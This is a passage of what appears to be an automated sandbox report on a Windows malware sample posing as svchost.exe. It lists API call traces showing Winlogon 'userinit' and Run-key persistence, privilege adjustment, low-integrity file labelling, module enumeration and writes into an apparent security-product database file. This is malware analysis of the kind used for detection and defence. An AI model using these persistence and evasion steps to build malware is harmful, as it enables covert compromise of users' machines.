                                                                                                                                                                                                              • Opcode ID: c2cfc78bf8ebbddfe578eed1149dd37ad5d44d2468cf441e3f946de9d75e2f01
                                                                                                                                                                                                              • Instruction ID: c61c80934eaaaf67d836deac9e8b9dff7181b08c263fcb68c49ceaa3703d83d8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c2cfc78bf8ebbddfe578eed1149dd37ad5d44d2468cf441e3f946de9d75e2f01
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9F41A771A802187BEB14DB90CC99FFD777D9B44700F504694BA06E6180EBB19EC4CB64
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,00000023,00000000,00000000,?), ref: 0040255C
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000,00000000), ref: 004025C0
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,000017A8,00000000,00000000), ref: 004025E3
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 004025F8
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000B98,00000000,00000000), ref: 00402604
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402613
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,000017E4,00000000,00000000), ref: 0040261F
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 0040262E
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,000017DC,00000000,00000000), ref: 0040263A
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402649
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00003380,00000000,00000000), ref: 00402655
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402664
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00402667
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$PointerWrite$CloseCreateFolderHandlePath
                                                                                                                                                                                                              • String ID: \PrevxCSI\csidb.csi
                                                                                                                                                                                                              • API String ID: 606440919-2829233815
                                                                                                                                                                                                              • Opcode ID: 79a3c48366173e2e4432591fd9d0211125a55660129729a41d6644ffa549504a
                                                                                                                                                                                                              • Instruction ID: 8b448ea0795f31fda95dadee176b54ca291314fb6d6361d02f59f031212173a5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 79a3c48366173e2e4432591fd9d0211125a55660129729a41d6644ffa549504a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D93128716842187EF311EB90DC9AFEE7768EB89B00F104165F304AA1D0DBF16A45CBE9
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02643325
                                                                                                                                                                                                              • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 02643344
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?), ref: 02643351
                                                                                                                                                                                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 0264336E
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02643389
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000101,00000000), ref: 026433A7
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,00000101,00000000), ref: 026433DE
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(00000000,userinit,00000000,00000001,C:\Windows\apppatch\svchost.exe,00000104), ref: 026433FC
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0264340A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • C:\Windows\apppatch\svchost.exe, xrefs: 026433B4, 026433EB
                                                                                                                                                                                                              • userinit, xrefs: 026433F6
                                                                                                                                                                                                              • software\microsoft\windows\currentversion\run, xrefs: 026433D4
                                                                                                                                                                                                              • software\microsoft\windows nt\currentversion\winlogon, xrefs: 0264339D
                                                                                                                                                                                                              • SystemDrive, xrefs: 0264333F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Open$AdminBackslashCloseEnvironmentInformationPathQueryUserValueVariableVolume_snprintf
                                                                                                                                                                                                              • String ID: C:\Windows\apppatch\svchost.exe$SystemDrive$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                              • API String ID: 3780845138-4271125494
                                                                                                                                                                                                              • Opcode ID: 6c0e29c06c448da27904e7ceb4ec7309aa1ea5901e8af449ae29754bdbc85792
                                                                                                                                                                                                              • Instruction ID: 4747619bf2acc29bc8a5860313919fd323a9515cd9677063cca9127f9645a4dd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6c0e29c06c448da27904e7ceb4ec7309aa1ea5901e8af449ae29754bdbc85792
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6B210175A80308FBFB14DB90CC8AFEE777CEB44B04F914688B606A6180DBF55654CB61
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,76F8F380,00000000,00000000,?,?,02654E91,?,00000000), ref: 026474C6
                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(00000000,?,?,?,02654E91,?,00000000,?,?,00000000), ref: 026474E4
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,02654E91,?,00000000,?,?,00000000), ref: 0264750D
                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,?,02654E91,?,00000000,?,?,00000000), ref: 02647514
                                                                                                                                                                                                              • memset.MSVCRT ref: 02647527
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02647553
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02647563
                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 02647572
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02647585
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02647594
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 0264759B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 026475A8
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 026475AF
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 026475CF
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 026475E0
                                                                                                                                                                                                              • IsBadWritePtr.KERNEL32(?,00000004), ref: 026475F0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileHeap$Process$Handle$AllocateCloseCreateFreeInformationLockPointerReadSizeUnlockValidateWritememset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2214028410-0
                                                                                                                                                                                                              • Opcode ID: 0644518bee898d8627ae1ffc60655f4b74c67c73455393a8c9f2086db50f09a1
                                                                                                                                                                                                              • Instruction ID: c67bdc739f7895eddad571030203f4cc7b7abbee147f12e7cac630eec18966f4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0644518bee898d8627ae1ffc60655f4b74c67c73455393a8c9f2086db50f09a1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5341B371A40304BBDB219FA59C88FAFBB7CEB44711F518618FA56EA280DF749540CBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,76F8F380,00000000,00000000,?,00000000,00000000,?,00000000), ref: 0264738D
                                                                                                                                                                                                                • Part of subcall function 02665930: GetCurrentThread.KERNEL32 ref: 02665940
                                                                                                                                                                                                                • Part of subcall function 02665930: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,02654D1B,?,?,00000000), ref: 02665947
                                                                                                                                                                                                                • Part of subcall function 02665930: GetCurrentProcess.KERNEL32(00000020,02654D1B,?,?,?,?,02654D1B,?,?,00000000), ref: 02665957
                                                                                                                                                                                                                • Part of subcall function 02665930: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,02654D1B,?,?,00000000), ref: 0266595E
                                                                                                                                                                                                                • Part of subcall function 02665930: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 02665981
                                                                                                                                                                                                                • Part of subcall function 02665930: AdjustTokenPrivileges.KERNELBASE(02654D1B,00000000,00000001,00000000,00000000,00000000), ref: 0266599B
                                                                                                                                                                                                                • Part of subcall function 02665930: GetLastError.KERNEL32 ref: 026659A5
                                                                                                                                                                                                                • Part of subcall function 02665930: CloseHandle.KERNEL32(02654D1B), ref: 026659B6
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 026473B4
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?), ref: 026473D5
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 026473EE
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 026473F8
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000), ref: 0264740C
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0264741B
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0264742D
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0264743D
                                                                                                                                                                                                              • SetEndOfFile.KERNEL32(00000000), ref: 0264744A
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 0264746C
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0264747D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Security$DescriptorHandleToken$CloseCurrentOpenProcessThread$AdjustConvertCreateErrorFreeInfoInformationLastLocalLockLookupNamedPointerPrivilegePrivilegesSaclStringUnlockValueWrite
                                                                                                                                                                                                              • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                              • API String ID: 1027056982-820036962
                                                                                                                                                                                                              • Opcode ID: 2b437ed62d6bee6d16408ed642f5f95fc7633b3e8be49bcb11960b061d72eef9
                                                                                                                                                                                                              • Instruction ID: 6356a449f25186e4d705621c0eb519da11c3f01105d556c20839598ab3fc02dc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2b437ed62d6bee6d16408ed642f5f95fc7633b3e8be49bcb11960b061d72eef9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1441E875A80208BBE7118E64DC89FFEBBACEF44754F518115FE45DA2C0DB709940C7A1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegCreateKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000000,00000000,00000102,00000000,?,00000000,00000000), ref: 0040296B
                                                                                                                                                                                                              • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 00402986
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?), ref: 00402993
                                                                                                                                                                                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 004029B0
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 004029CB
                                                                                                                                                                                                              • RegCreateKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,00000000,00000000,00000102,00000000,00000000,00000000), ref: 00402A1A
                                                                                                                                                                                                              • RegSetValueExA.KERNELBASE(00000000,userinit,00000000,00000001,?,?), ref: 00402A3E
                                                                                                                                                                                                              • RegFlushKey.ADVAPI32(00000000), ref: 00402A4D
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00402A57
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • software\microsoft\windows nt\currentversion\winlogon, xrefs: 00402953
                                                                                                                                                                                                              • userinit, xrefs: 00402A38
                                                                                                                                                                                                              • software\microsoft\windows\currentversion\run, xrefs: 00402A10
                                                                                                                                                                                                              • SystemDrive, xrefs: 00402981
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Create$BackslashCloseEnvironmentFlushInformationPathValueVariableVolume_snprintf
                                                                                                                                                                                                              • String ID: SystemDrive$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                              • API String ID: 3547530944-2324515132
                                                                                                                                                                                                              • Opcode ID: 15ecb4030802b486445de4a6135ce48a3b5379f8823ffe5b2d75d15eecc358be
                                                                                                                                                                                                              • Instruction ID: cfc36ad3083988d5491cb46672b4500e56a1c5dd6b6f1e6a0940d5df759a06a8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 15ecb4030802b486445de4a6135ce48a3b5379f8823ffe5b2d75d15eecc358be
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F93147B5740305BBE720DB54DE4AFEA777CDB95B00F204155FB44BA1C0DAF4AA448BA8
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 00401D16
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000,76F90F00,00000000,00000000), ref: 00401D27
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00401D30
                                                                                                                                                                                                              • SwitchToThread.KERNEL32 ref: 00401D3F
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401D48
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401D68
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00401D79
                                                                                                                                                                                                              • Module32First.KERNEL32(00000000,?), ref: 00401D9A
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,kernel), ref: 00401DBC
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,.dll), ref: 00401DC8
                                                                                                                                                                                                              • Module32Next.KERNEL32(00000000,00000224), ref: 00401DD6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateHandleModule32SnapshotToolhelp32$CloseErrorFirstInformationLastNextSwitchThreadmemset
                                                                                                                                                                                                              • String ID: .dll$kernel
                                                                                                                                                                                                              • API String ID: 2979424695-2375045364
                                                                                                                                                                                                              • Opcode ID: cee277edecab6c5d0af180dabfacc852270d041963c786b3d0827f3f906c2871
                                                                                                                                                                                                              • Instruction ID: c283e2339ecb9e17340db761c1aee5b765af185a9d94a0bcce3757d144b29585
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cee277edecab6c5d0af180dabfacc852270d041963c786b3d0827f3f906c2871
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8621AB72A012146BD710ABA5AD4CFDF77A89F99321F100276EA14F32E0EA34ED458768
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 026656A6
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,?,?,00000000,76F90F00), ref: 026656B7
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 026656C0
                                                                                                                                                                                                              • SwitchToThread.KERNEL32 ref: 026656CF
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 026656D8
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 026656F8
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02665709
                                                                                                                                                                                                              • Module32First.KERNEL32(00000000,?), ref: 0266572A
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,kernel), ref: 0266574C
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,.dll), ref: 02665758
                                                                                                                                                                                                              • Module32Next.KERNEL32(00000000,00000224), ref: 02665766
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateHandleModule32SnapshotToolhelp32$CloseErrorFirstInformationLastNextSwitchThreadmemset
                                                                                                                                                                                                              • String ID: .dll$kernel
                                                                                                                                                                                                              • API String ID: 2979424695-2375045364
                                                                                                                                                                                                              • Opcode ID: 38a899e39fd4286b1ec3647ef067b76971f3433be1879c5cf626af0865a802ad
                                                                                                                                                                                                              • Instruction ID: cc9cb1bfcb1c9b117bc79b361c7b7b44feb385af0c3f0b93b656b55632c82b5d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 38a899e39fd4286b1ec3647ef067b76971f3433be1879c5cf626af0865a802ad
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6B21BA71D41114FBD720AAA8EC8DFBE7BA8EB45324F950355E946D3280EB30DD45CBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 026477DE
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 026477E5
                                                                                                                                                                                                              • memset.MSVCRT ref: 026477F9
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,026645C4,00000104), ref: 02647808
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(00000000), ref: 0264780F
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02647883
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02647886
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02647893
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02647896
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$AllocBackslashFreePathValidatelstrcpynmemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 296989886-0
                                                                                                                                                                                                              • Opcode ID: fa721572f29db3cf3ad7592add9e93c4c0a8d0ad616371f0ef7b9d1f91422fcf
                                                                                                                                                                                                              • Instruction ID: eba9fb4c68e756b562a643a6072b185eb6ba898c6657d158305be269b1b6b3fe
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fa721572f29db3cf3ad7592add9e93c4c0a8d0ad616371f0ef7b9d1f91422fcf
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9E41F9719083469BCB229F309CD9FBBBFAAAF41244F495954E9C287241EF22D409C791
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02646CA1
                                                                                                                                                                                                              • memset.MSVCRT ref: 02646CBF
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?,?,?,?,?,?,00000000), ref: 02646CDB
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(?,75775DDDa,00000000,00000001,?,00000104,?,?,?,?,?,00000000), ref: 02646D02
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 02646D7A
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02646D81
                                                                                                                                                                                                              • memset.MSVCRT ref: 02646D95
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 02646DAE
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,00000000), ref: 02646DBC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset$Heap$AllocCloseOpenProcessQueryValuelstrcpyn
                                                                                                                                                                                                              • String ID: 75775DDDa$software\microsoft
                                                                                                                                                                                                              • API String ID: 217510255-3143690122
                                                                                                                                                                                                              • Opcode ID: b7a00cd7abbf954168663e2f584b857d0f50b81529c8a2a6f9a69578f0d61b23
                                                                                                                                                                                                              • Instruction ID: f3fc2fb503c812b200b83a51a566d01f5414661dcd19844e1fc714f9956927f9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b7a00cd7abbf954168663e2f584b857d0f50b81529c8a2a6f9a69578f0d61b23
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 37310A70E4122C66DB25EB65CC49FDE7B7CEF05B04F00469CF549E2280EBB04A848BE1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02646B41
                                                                                                                                                                                                              • memset.MSVCRT ref: 02646B5F
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(00000001,software\microsoft,00000000,00000101,80000001,?,?,?,?,?,00000000), ref: 02646B7A
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(80000001,75775DDDa,00000000,00000001,?,00000104,?,?,?,?,?,00000000), ref: 02646BA1
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 02646C1A
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02646C21
                                                                                                                                                                                                              • memset.MSVCRT ref: 02646C35
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 02646C4E
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(80000001,?,?,?,?,?,00000000), ref: 02646C5C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset$Heap$AllocCloseOpenProcessQueryValuelstrcpyn
                                                                                                                                                                                                              • String ID: 75775DDDa$software\microsoft
                                                                                                                                                                                                              • API String ID: 217510255-3143690122
                                                                                                                                                                                                              • Opcode ID: 6cf19f72aa8e23fe67618559c8d68b1d81d57411687e0e0b509ace573829546a
                                                                                                                                                                                                              • Instruction ID: f97545a00be90b8cffaa49780004e6178bb647dc65e010f625b5c2569225f320
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6cf19f72aa8e23fe67618559c8d68b1d81d57411687e0e0b509ace573829546a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F831E970D41269AAEB25DB64CC49FDE7B7CEF15704F00469CE54AE6280EBB447848BA1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000400,00000000,00000000,00000000,00000000,76F90F00,?,?,?,?,?,?,?,?,02647F74), ref: 02664895
                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,00000018,?,?,?,?,?,?,?,?,?,02647F74), ref: 026648AC
                                                                                                                                                                                                              • GetTokenInformation.KERNELBASE(?,00000007(TokenIntegrityLevel),?,00000010,?,?,?,?,?,?,?,?,?,02647F74), ref: 026648CA
                                                                                                                                                                                                              • CharUpperA.USER32(?,?,?,?,?,?,?,?,?,02647F74), ref: 026648E2
                                                                                                                                                                                                              • CharUpperA.USER32(?,?,?,?,?,?,?,?,?,02647F74), ref: 02664908
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(?,00000000), ref: 0266493B
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0266494C
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 0266495E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0266496F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
